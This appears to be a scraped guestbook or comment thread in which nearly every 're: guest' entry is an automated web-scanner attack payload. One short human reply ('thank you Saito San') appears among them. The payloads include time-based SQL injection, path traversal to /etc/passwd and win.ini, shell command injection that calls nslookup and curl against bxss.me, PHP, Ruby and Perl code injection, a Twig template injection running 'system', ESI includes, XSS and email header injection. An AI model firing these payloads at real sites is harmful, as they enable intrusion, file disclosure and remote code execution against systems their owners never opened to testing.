\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: guest
WEB-INF/web.xml
re: guest
WEB-INF\web.xml
re: guest
${9999576+9999322}
re: guest
)
re: guest
!(()&&!|*|*|
re: guest
^(#$!@#$)(()))******
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: guest
'.gethostbyname(lc('hitgm'.'ozctzazmf90a6.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(115).chr(73).chr(111).chr(77).'
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: guest
".gethostbyname(lc("hitkk"."stgaebyp0f954.bxss.me."))."A".chr(67).chr(hex("58")).chr(100).chr(89).chr(115).chr(77)."
re: guest
Http://bxss.me/t/fit.txt
re: guest
http://bxss.me/t/fit.txt%3F.jpg
re: guest
/etc/shells
re: guest
c:/windows/win.ini
re: guest
bxss.me
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
';print(md5(31337));$a='
re: guest
bxss.me/t/xss.html?%00
re: guest
";print(md5(31337));$a="
re: guest
"+"A".concat(70-3).concat(22*4).concat(109).concat(67).concat(106).concat(85)+(require"socket"
Socket.gethostbyname("hitlc"+"bejldnwp1bda1.bxss.me.")[3].to_s)+"
re: guest
${@print(md5(31337))}
re: guest
'+'A'.concat(70-3).concat(22*4).concat(104).concat(88).concat(118).concat(82)+(require'socket'
Socket.gethostbyname('hitbh'+'xzsmzdppda3ad.bxss.me.')[3].to_s)+'
re: guest
${@print(md5(31337))}\
re: guest
'.print(md5(31337)).'
re: guest
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: guest
'"
re: guest
<!--
re: guest
1GNPIRN370
re: guest
response.write(9339613*9986649)
re: guest
'+response.write(9339613*9986649)+'
re: guest
"+response.write(9339613*9986649)+"
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
${9999822+10000475}
re: guest
file:///etc/passwd
re: guest
../
re: guest
)
re: guest
!(()&&!|*|*|
re: guest
^(#$!@#$)(()))******
re: guest
redirtest.acx
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
re: guest
echo cszxof$()\ vriumq\nz^xyu||a #' &echo cszxof$()\ vriumq\nz^xyu||a #|" &echo cszxof$()\ vriumq\nz^xyu||a #
re: guest
/etc/shells
re: guest
&echo muzcek$()\ gmwmqc\nz^xyu||a #' &echo muzcek$()\ gmwmqc\nz^xyu||a #|" &echo muzcek$()\ gmwmqc\nz^xyu||a #
re: guest
../../../../../../../../../../../../../../etc/shells
re: guest
|echo llcois$()\ uocybq\nz^xyu||a #' |echo llcois$()\ uocybq\nz^xyu||a #|" |echo llcois$()\ uocybq\nz^xyu||a #
re: guest
'.gethostbyname(lc('hitys'.'tijcterde82c5.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(121).chr(69).chr(114).chr(76).'
re: guest
c:/windows/win.ini
re: guest
expr 9000393715 - 970384
re: guest
".gethostbyname(lc("hitbt"."bescxxvj3b9b7.bxss.me."))."A".chr(67).chr(hex("58")).chr(103).chr(89).chr(111).chr(68)."
re: guest
bxss.me
re: guest
(nslookup -q=cname hitjintveqkdg7ee26.bxss.me||curl hitjintveqkdg7ee26.bxss.me))
re: guest
gethostbyname(lc('hitpr'.'dblowaoa33dfb.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(122).chr(88).chr(118).chr(83)
re: guest
Http://bxss.me/t/fit.txt
re: guest
$(nslookup -q=cname hitphfazosoqh8d4d5.bxss.me||curl hitphfazosoqh8d4d5.bxss.me)
re: guest
http://bxss.me/t/fit.txt?.jpg
re: guest
&nslookup -q=cname hitobhjxydrha7e735.bxss.me&'\"`0&nslookup -q=cname hitobhjxydrha7e735.bxss.me&`'
re: guest
ctime
sleep
p0
(I30
tp1
Rp2
.
re: guest
&(nslookup -q=cname hitgzzzxtpumn32783.bxss.me||curl hitgzzzxtpumn32783.bxss.me)&'\"`0&(nslookup -q=cname hitgzzzxtpumn32783.bxss.me||curl hitgzzzxtpumn32783.bxss.me)&`'
re: guest
|(nslookup -q=cname hitvaislibcqhc7468.bxss.me||curl hitvaislibcqhc7468.bxss.me)
re: guest
`(nslookup -q=cname hitkfknygejrw9c09a.bxss.me||curl hitkfknygejrw9c09a.bxss.me)`
re: guest
;(nslookup -q=cname hitukeodaborb62540.bxss.me||curl hitukeodaborb62540.bxss.me)|(nslookup -q=cname hitukeodaborb62540.bxss.me||curl hitukeodaborb62540.bxss.me)&(nslookup -q=cname hitukeodaborb62540.bxss.me||curl hitukeodaborb62540.bxss.me)
re: guest
'"()
re: guest
|(nslookup${IFS}-q${IFS}cname${IFS}hitmyvlmxrnhb91b29.bxss.me||curl${IFS}hitmyvlmxrnhb91b29.bxss.me)
re: guest
'&&sleep(27*1000)*zjiwqz&&'
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
&(nslookup${IFS}-q${IFS}cname${IFS}hitjurnlpxmguc2d15.bxss.me||curl${IFS}hitjurnlpxmguc2d15.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitjurnlpxmguc2d15.bxss.me||curl${IFS}hitjurnlpxmguc2d15.bxss.me)&`'
re: guest
"&&sleep(27*1000)*sfetld&&"
re: guest
';print(md5(31337));$a='
re: guest
'||sleep(27*1000)*amaaut||'
re: guest
";print(md5(31337));$a="
re: guest
"||sleep(27*1000)*caaucr||"
re: guest
${@print(md5(31337))}
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
${@print(md5(31337))}\
re: guest
bxss.me/t/xss.html?%00
re: guest
'.print(md5(31337)).'
re: guest
"+"A".concat(70-3).concat(22*4).concat(121).concat(82).concat(114).concat(87)+(require"socket"
Socket.gethostbyname("hitlh"+"wpgamxyz6db2a.bxss.me.")[3].to_s)+"
re: guest
'+'A'.concat(70-3).concat(22*4).concat(103).concat(90).concat(119).concat(90)+(require'socket'
Socket.gethostbyname('hitbl'+'qyaadhgz990d1.bxss.me.')[3].to_s)+'
re: guest
'A'.concat(70-3).concat(22*4).concat(121).concat(71).concat(116).concat(90)+(require'socket'
Socket.gethostbyname('hitru'+'hlqebphn59b5f.bxss.me.')[3].to_s)
re: guest
replies
re: guest
replies�
re: guest
replies/.
re: guest
'"
re: guest
<!--
re: guest
'"()&%<zzz><ScRiPt >IymX(9458)</ScRiPt>
re: guest
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitqnccjgeqwyb2e2e.bxss.me")}}
re: guest
'"()&%<zzz><ScRiPt >IymX(9900)</ScRiPt>
re: guest
9552084
re: guest
crWEYvJz
re: guest
*1
re: guest
*1
re: guest
*1
re: guest
*1
re: guest
-1 OR 5*5=25 --
re: guest
-1 OR 5*5=26 --
re: guest
-1 OR 5*5=25
re: guest
-1 OR 5*5=26
re: guest
*if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
-1 waitfor delay '0:0:15' --
re: guest
8MgNHI8Z'; waitfor delay '0:0:15' --
re: guest
-1 OR 206=(SELECT 206 FROM PG_SLEEP(15))--
re: guest
-1) OR 990=(SELECT 990 FROM PG_SLEEP(15))--
re: guest
-1)) OR 639=(SELECT 639 FROM PG_SLEEP(15))--
re: guest
URSgiCYQ' OR 47=(SELECT 47 FROM PG_SLEEP(15))--
re: guest
4dJBpIJl') OR 865=(SELECT 865 FROM PG_SLEEP(15))--
re: guest
kA0Fx1lp')) OR 566=(SELECT 566 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
'"
re: guest
@@IyABU
re: guest
(select 198766*667891)
re: guest
(select 198766*667891 from DUAL)
thank you Saito San
re: guest
5unMuhoT
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+297-297-1=0+0+0+1
re: guest
-1 OR 3+297-297-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
8imOX9fO'; waitfor delay '0:0:15' --
re: guest
-5 OR 137=(SELECT 137 FROM PG_SLEEP(15))--
re: guest
-5) OR 477=(SELECT 477 FROM PG_SLEEP(15))--
re: guest
-1)) OR 895=(SELECT 895 FROM PG_SLEEP(15))--
re: guest
zRoyBo1u' OR 366=(SELECT 366 FROM PG_SLEEP(15))--
re: guest
qo8wIy9g') OR 966=(SELECT 966 FROM PG_SLEEP(15))--
re: guest
8ktr4ps3')) OR 300=(SELECT 300 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@XXGwn
re: guest
1ChH0HV7VIO
re: guest
response.write(9451849*9166096)
re: guest
'+response.write(9451849*9166096)+'
re: guest
"+response.write(9451849*9166096)+"
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
%0abcc:074625.67-22073.67.d5462.19990.2@bxss.me
re: guest
to@example.com>%0d%0abcc:074625.67-22074.67.d5462.19990.2@bxss.me
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
${9999437+9999535}
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
file:///etc/passwd
re: guest
../../../../../../../../../../../../../../../proc/version
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: guest
../../../../../../../../../../etc/passwd%00.jpg
re: guest
'.gethostbyname(lc('hitdg'.'vqvezwgo9638c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(115).chr(74).chr(115).chr(82).'
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: guest
)
re: guest
".gethostbyname(lc("hiteb"."duwqavnk50da5.bxss.me."))."A".chr(67).chr(hex("58")).chr(99).chr(84).chr(102).chr(68)."
re: guest
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: guest
!(()&&!|*|*|
re: guest
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: guest
^(#$!@#$)(()))******
re: guest
/etc/passwd
re: guest
echo hmfztc$()\ xazwcf\nz^xyu||a #' &echo hmfztc$()\ xazwcf\nz^xyu||a #|" &echo hmfztc$()\ xazwcf\nz^xyu||a #
re: guest
%2fetc%2fpasswd
re: guest
&echo xuyxyf$()\ ftjqeo\nz^xyu||a #' &echo xuyxyf$()\ ftjqeo\nz^xyu||a #|" &echo xuyxyf$()\ ftjqeo\nz^xyu||a #
re: guest
/.././.././.././.././.././.././.././../etc/./passwd%00
re: guest
|echo hlixso$()\ uwfudw\nz^xyu||a #' |echo hlixso$()\ uwfudw\nz^xyu||a #|" |echo hlixso$()\ uwfudw\nz^xyu||a #
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: guest
(nslookup hitanwfzldfpo980fa.bxss.me||perl -e "gethostbyname('hitanwfzldfpo980fa.bxss.me')")
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: guest
"+"A".concat(70-3).concat(22*4).concat(103).concat(67).concat(104).concat(81)+(require"socket"
Socket.gethostbyname("hitka"+"qnobnyri35fe9.bxss.me.")[3].to_s)+"
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: guest
$(nslookup hitoenmtrdlvxaa734.bxss.me||perl -e "gethostbyname('hitoenmtrdlvxaa734.bxss.me')")
re: guest
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: guest
'+'A'.concat(70-3).concat(22*4).concat(108).concat(76).concat(98).concat(73)+(require'socket'
Socket.gethostbyname('hitvj'+'usvtdyyi23ce2.bxss.me.')[3].to_s)+'
re: guest
bxss.me/t/xss.html?%00
re: guest
Http://bxss.me/t/fit.txt
re: guest
&nslookup hitzmzzkmakuj93fad.bxss.me&'\"`0&nslookup hitzmzzkmakuj93fad.bxss.me&`'
re: guest
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: guest
http://bxss.me/t/fit.txt%3F.jpg
re: guest
&(nslookup hithamlrgvklw3f5df.bxss.me||perl -e "gethostbyname('hithamlrgvklw3f5df.bxss.me')")&'\"`0&(nslookup hithamlrgvklw3f5df.bxss.me||perl -e "gethostbyname('hithamlrgvklw3f5df.bxss.me')")&`'
re: guest
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: guest
';print(md5(31337));$a='
re: guest
/etc/shells
re: guest
|(nslookup hitqzoovdasnbd4a71.bxss.me||perl -e "gethostbyname('hitqzoovdasnbd4a71.bxss.me')")
re: guest
file:///etc/passwd
re: guest
";print(md5(31337));$a="
re: guest
c:/windows/win.ini
re: guest
`(nslookup hitzktzqfxfjn5c30f.bxss.me||perl -e "gethostbyname('hitzktzqfxfjn5c30f.bxss.me')")`
re: guest
/\../\../\../\../\../\../\../etc/passwd
re: guest
${@print(md5(31337))}
re: guest
bxss.me
re: guest
;(nslookup hitouprpekzjf302dc.bxss.me||perl -e "gethostbyname('hitouprpekzjf302dc.bxss.me')")|(nslookup hitouprpekzjf302dc.bxss.me||perl -e "gethostbyname('hitouprpekzjf302dc.bxss.me')")&(nslookup hitouprpekzjf302dc.bxss.me||perl -e "gethostbyname('hitouprpekzjf302dc.bxss.me')")
re: guest
/WEB-INF/web.xml
re: guest
${@print(md5(31337))}\
re: guest
'"
re: guest
C:\WINDOWS\system32\drivers\etc\hosts
re: guest
'.print(md5(31337)).'
re: guest
<!--
re: guest
../../../../../../../../../../windows/win.ini%00.jpg
re: guest
/../../../../../../../../../../boot.ini
re: guest
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: guest
..\..\..\..\..\..\..\..\windows\win.ini
re: guest
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: guest
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: guest
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\